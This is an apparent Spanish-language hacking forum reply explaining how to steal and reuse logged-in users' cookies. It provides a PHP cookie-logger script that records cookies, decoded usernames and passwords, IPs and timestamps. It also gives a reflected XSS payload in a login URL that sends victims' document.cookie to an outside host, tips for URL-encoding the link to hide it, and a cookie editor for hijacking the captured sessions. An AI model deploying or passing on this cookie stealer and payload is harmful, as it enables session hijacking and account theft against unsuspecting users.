-0 ... de donde has salido tu... En fin a responder se ha dicho.
Según lo que veo tu quieres hacer un cookie poisoning.
Queremos falsificar las cookies de los usuarios registrados, así que evidentemente tendremos que capturarlas no?
Para ello hacemos un capturador de cookies y lo subimos a un host con privilegios 777.
Para ver este enlace Registrate o Inicia SesionCódigo por _mÙëK§™_
<?php
$archivo = fopen('coockieslog.htm','a');//Aquí puedes cambiar el nombre del archivo
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>
IP: ' .$ip. '
Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
Ahora el código que llenará nuestro capturador :P
http://www.loginvulnerable/login.php?nombre del textbox=<script>window.location='http://explicacion.com/coockieslog.php?cookie='+document.cookie;</script>&varia depende del nombre del botón=;
Y ahora solo queda esperar. Para disimular la url te recomiendo usar esto:
Para ver este enlace Registrate o Inicia Sesionhttp://meyerweb.com/eric/tools/dencoder/
Después solo queda usar el cookie editor para modificar tu cookie por alguna de las capturadas
Cookie Editor:
Para ver este enlace Registrate o Inicia Sesionhttps://addons.mozilla.org/es-ES/firefox/addon/573